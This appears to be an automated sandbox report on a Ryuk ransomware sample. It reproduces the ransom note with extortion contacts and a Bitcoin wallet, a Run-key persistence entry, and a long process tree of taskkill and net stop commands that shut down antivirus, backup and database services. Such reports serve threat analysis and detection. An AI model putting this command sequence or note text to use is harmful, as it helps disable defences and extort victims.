Analysis
max time kernel: 146s
max time network: 150s
platform: windows10_x64
resource: win10v20210410
submitted: 17/04/2021, 13:15
Static task
static1
Behavioral task behavioral1: sample dll64.dll, resource win7v20210410, 0 signatures, 0 seconds
Behavioral task behavioral2: sample dll64.dll, resource win10v20210408, 0 signatures, 0 seconds
Behavioral task behavioral3: sample eiavW.exe, resource win7v20210410, 0 signatures, 0 seconds
Behavioral task behavioral4: sample eiavW.exe, resource win10v20210410, 0 signatures, 0 seconds
General
Target: eiavW.exe
Score: 10/10
Malware Config
Extracted
Path: C:\RyukReadMe.txt
Family: ryuk
Ransom Note
Gentlemen!
Your business is at serious risk.
There is a significant hole in the security system of your company.
We've easily penetrated your network.
You should thank the Lord for being hacked by serious people not some stupid schoolboys or dangerous punks.
They can damage all your important data just for fun.
Now your files are crypted with the strongest millitary algorithms RSA4096 and AES-256.
No one can help you to restore files without our special decoder.
Photorec, RannohDecryptor etc. repair tools
are useless and can destroy your files irreversibly.
If you want to restore your files write to emails (contacts are at the bottom of the sheet)
and attach 2-3 encrypted files
(Less than 5 Mb each, non-archived and your files should not contain valuable information
(Databases, backups, large excel sheets, etc.)).
You will receive decrypted samples and our conditions how to get the decoder.
Please don't forget to write the name of your company in the subject of your e-mail.
You have to pay for decryption in Bitcoins.
The final price depends on how fast you write to us.
Every day of delay will cost you additional +0.5 BTC
Nothing personal just business
As soon as we get bitcoins you'll get all your decrypted data back.
Moreover you will get instructions how to close the hole in security
and how to avoid such problems in the future
+ we will recommend you special software that makes the most problems to hackers.
Attention! One more time !
Do not rename encrypted files.
Do not try to decrypt your data using third party software.
P.S. Remember, we are not scammers.
We don`t need your files and your information.
But after 2 weeks all your files and keys will be deleted automatically.
Just send a request immediately after infection.
All data will be restored absolutely.
Your warranty - decrypted samples.
contact emails
[email protected]
or
[email protected]
BTC wallet:
15RLWdVnY5n1n7mTvU1zjg67wt86dhYqNj
Ryuk
No system is safe
Wallets
15RLWdVnY5n1n7mTvU1zjg67wt86dhYqNj
Signatures
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
File opened for modification: C:\Users\Admin\Pictures\SearchInstall.tiff (process: sihost.exe)
File opened for modification: C:\Users\Admin\Pictures\BlockComplete.tiff (process: sihost.exe)
Drops startup file 1 IoCs
File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt (process: sihost.exe)
Adds Run key to start application 2 TTPs 2 IoCs
Key created: \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (process: reg.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\Users\\Admin\\AppData\\Local\\Temp\\eiavW.exe" (process: reg.exe)
Drops file in Program Files directory 64 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 1 IoCs
pid: 7936, pid_target: 3820, Process: WerFault.exe, procid_target: 49
Kills process with taskkill 44 IoCs
Runs net.exe
Suspicious behavior: EnumeratesProcesses 29 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid: 3680, Process: eiavW.exe
Suspicious use of AdjustPrivilegeToken 46 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵PID:3244
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3820
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3820 -s 8482⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7936
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3580
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵PID:3256
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2712
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2480
-
c:\windows\system32\sihost.exesihost.exe1⤵
- Modifies extensions of user files
- Drops startup file
- Drops file in Program Files directory
PID:2432
-
C:\Users\Admin\AppData\Local\Temp\eiavW.exe"C:\Users\Admin\AppData\Local\Temp\eiavW.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:200
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3788
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3764
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4216
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4356
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4624
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4700
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4756
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5124
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5180
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5240
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5308
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5372
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5440
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5496
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5564
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5628
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5680
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5764
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5820
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5908
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5972
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6016
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y2⤵PID:6088
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider" /y3⤵PID:6160
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y2⤵PID:5000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Enterprise Client Service" /y3⤵PID:6248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y4⤵PID:8132
-
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Agent" /y2⤵PID:5380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent" /y3⤵PID:6320
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y2⤵PID:2196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y3⤵PID:6276
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y2⤵PID:5916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service" /y3⤵PID:6456
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y2⤵PID:5668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service" /y3⤵PID:6520
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y2⤵PID:6200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service" /y3⤵PID:6532
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Health Service" /y2⤵PID:6288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service" /y3⤵PID:6660
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y2⤵PID:6340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent" /y3⤵PID:6724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y4⤵PID:7404
-
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y2⤵PID:6396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client" /y3⤵PID:6832
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Message Router" /y2⤵PID:6488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router" /y3⤵PID:6944
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y2⤵PID:6620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service" /y3⤵PID:7092
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y2⤵PID:6696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service" /y3⤵PID:6140
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y2⤵PID:6748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service" /y3⤵PID:6704
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y2⤵PID:6788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service" /y3⤵PID:6740
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y2⤵PID:6872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y3⤵PID:2136
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AcronisAgent /y2⤵PID:6928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:6416
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y2⤵PID:6816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery" /y3⤵PID:6448
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y2⤵PID:6560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵PID:7172
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AcrSch2Svc /y2⤵PID:6988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:6440
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop Antivirus /y2⤵PID:7060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵PID:5000
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ARSM /y2⤵PID:7112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵PID:5980
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop DCAgent /y2⤵PID:6552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵PID:7388
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop bedbg /y2⤵PID:6584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵PID:7380
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y2⤵PID:6220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:6624
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecRPCService /y2⤵PID:6412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:7212
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵PID:7664
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecManagementService /y2⤵PID:6784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:6688
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecJobEngine /y2⤵PID:6136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:6344
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵PID:6396
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y2⤵PID:6224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵PID:6400
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPSecurityService /y2⤵PID:6232
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6532
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵PID:7448
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EsgShKernel /y2⤵PID:6372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵PID:7744
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop FA_Scheduler /y2⤵PID:6288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵PID:7828
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EraserSvc11710 /y2⤵PID:6376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵PID:7440
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPUpdateService /y2⤵PID:2348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵PID:7400
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop macmnsvc /y2⤵PID:7188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵PID:7944
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IMAP4Svc /y2⤵PID:6956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IMAP4Svc /y3⤵PID:7800
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IISAdmin /y2⤵PID:6600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵PID:7780
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBAMService /y2⤵PID:7316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵PID:8064
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBEndpointAgent /y2⤵PID:7356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵PID:8080
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop masvc /y2⤵PID:7240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵PID:7936
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y2⤵PID:1712
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y2⤵PID:7156
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McTaskManager /y2⤵PID:7684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵PID:6776
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6796
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y4⤵PID:7488
-
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MMS /y2⤵PID:7868
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfevtp /y2⤵PID:7816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:7528
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfemms /y2⤵PID:7752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵PID:6240
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer /y2⤵PID:8004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵PID:6252
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer110 /y2⤵PID:8168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵PID:5960
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer100 /y2⤵PID:8108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵PID:7160
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mozyprobackup /y2⤵PID:7924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵PID:7740
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McShield /y2⤵PID:7620
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵PID:7560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵PID:6732
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFramework /y2⤵PID:7504
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeEngineService /y2⤵PID:7464
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵PID:6480
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵PID:8112
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeES /y2⤵PID:6856
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6620
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵PID:7120
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMTA /y2⤵PID:7040
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSA /y2⤵PID:6672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵PID:7456
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵PID:7136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵PID:6508
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y2⤵PID:7156
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵PID:1712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵PID:7432
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y2⤵PID:6920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵PID:7944
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y2⤵PID:7220
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7212
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵PID:7492
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPS /y2⤵PID:7392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵PID:7340
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y2⤵PID:6420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵PID:7508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y4⤵PID:6388
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6312
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:7400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:7976
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y2⤵PID:6760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher /y3⤵PID:6396
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵PID:7804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵PID:7608
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵PID:7372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵PID:5316
-
-
-
